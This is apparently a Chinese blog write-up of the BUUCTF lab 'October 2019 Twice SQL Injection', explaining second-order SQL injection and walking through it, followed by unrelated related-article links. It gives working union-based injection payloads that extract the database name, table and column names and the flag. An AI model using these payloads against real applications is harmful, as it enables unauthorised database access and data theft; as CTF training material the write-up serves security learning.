【BUUCTF】October 2019 Twice SQL Injection1及知识点整理

打开题目页面,是一个登陆界面

先进行注册,尝试使用SQL注入看看会返回什么

跳转到登陆界面,我们用刚才注册的登录

显示的界面如下

在这个页面输入SQL注入语句,发现将单引号转义为了\,其他关键字并没有过滤

查看给出的源码

发现给出了数据库名

以及注入点在username,且有单引号,判断为字符型注入

二次注入知识点

二次注入是指攻击者将恶意数据存储在数据库或其他存储介质中,当应用程序再次从存储介质中读取并使用这些数据时,没有进行适当的验证和过滤,导致恶意数据被执行,从而引发安全漏洞。通常会对关键字如单引号进行转义

攻击原理

攻击者通过某种方式,如在用户注册、评论、文件上传等功能模块中,将包含恶意代码或特殊字符的数据输入到应用程序中。应用程序没有对输入数据进行严格的验证和过滤,直接将其存储到数据库或其他存储位置。

当应用程序在后续的业务逻辑中,从存储介质中读取之前存储的用户输入数据,并在未进行充分安全检查的情况下,将其用于 SQL 查询、命令执行、模板渲染等操作,导致恶意数据被解析和执行,从而实现攻击者的目的,如获取敏感数据、篡改数据、执行系统命令等。

用户修改个人信息时,攻击者可在用户名、邮箱等字段中注入恶意 SQL 语句。若系统在更新或查询用户信息时未正确处理,就可能触发二次注入。

攻击者在发表评论时插入恶意脚本,当其他用户查看评论或系统对评论进行处理时,可能执行恶意脚本。

攻击者上传包含恶意代码的文件,系统存储后,若在后续处理文件内容时未做安全检测,可能导致恶意代码执行。

接下来进行二次注入

注册时在用户名处用输入恶意的SQL语句,进行爆破、查询等

在登陆中,输入同样的恶意语句,在这个过程中会将我们输入的语句和数据库对比,在

查询数据库中的用户名对比过程中,就会执行输入的恶意SQL语句

爆出数据库名

1' and 1=2 union select database() #

用户名处的语句最后的#将后面的语句注释了,故密码处可以随便简单输入

登录界面使用同样的语句

爆出了数据库名:ctftraining

爆出表名

1' and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #

爆出了表名flag,news,users

猜测flag在flag表中

爆出字段

1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#

爆出字段为flag

爆出字段内容

1' union select group_concat(flag) from flag#

最后得到flag

相关推荐
xhbh66642 分钟前
MySQL数据导出避坑指南:如何选择正确的工具并设计安全的备份策略?
数据库·mysql·oracle·程序员·mysql导出数据库
幻奏岚音1 小时前
《数据库系统概论》第一章 初识数据库
数据库·算法·oracle
蜗牛~turbo1 小时前
金蝶云星空 调价表取历史价格
java·数据库·sql·c#·database
半桔1 小时前
【Linux手册】信号量与建造者模式:以 PV 操作保证并发安全,分步组装构建复杂对象
linux·运维·安全·建造者模式
jc06201 小时前
4.1-中间件之Redis
数据库·redis·中间件
Elastic 中国社区官方博客1 小时前
介绍 Python Elasticsearch Client 的 ES|QL 查询构建器
大数据·开发语言·数据库·python·elasticsearch·搜索引擎·全文检索
网络之路Blog1 小时前
【实战中提升自己完结篇】分支篇之分支之无线、内网安全与QOS部署(完结)
网络协议·安全·网络之路一天·华为华三数通基础·网络设备管理·华为华三二三层交换机对接
✎﹏赤子·墨筱晗♪1 小时前
Nginx 配置 SSL/TLS 全指南:从安装到安全强化
nginx·安全·ssl
独行soc1 小时前
2025年渗透测试面试题总结-60(题目+回答)
java·python·安全·web安全·adb·面试·渗透测试
TG_yunshuguoji2 小时前
阿里云国际代理:云数据库RDS及上云方案
服务器·数据库·阿里云·云计算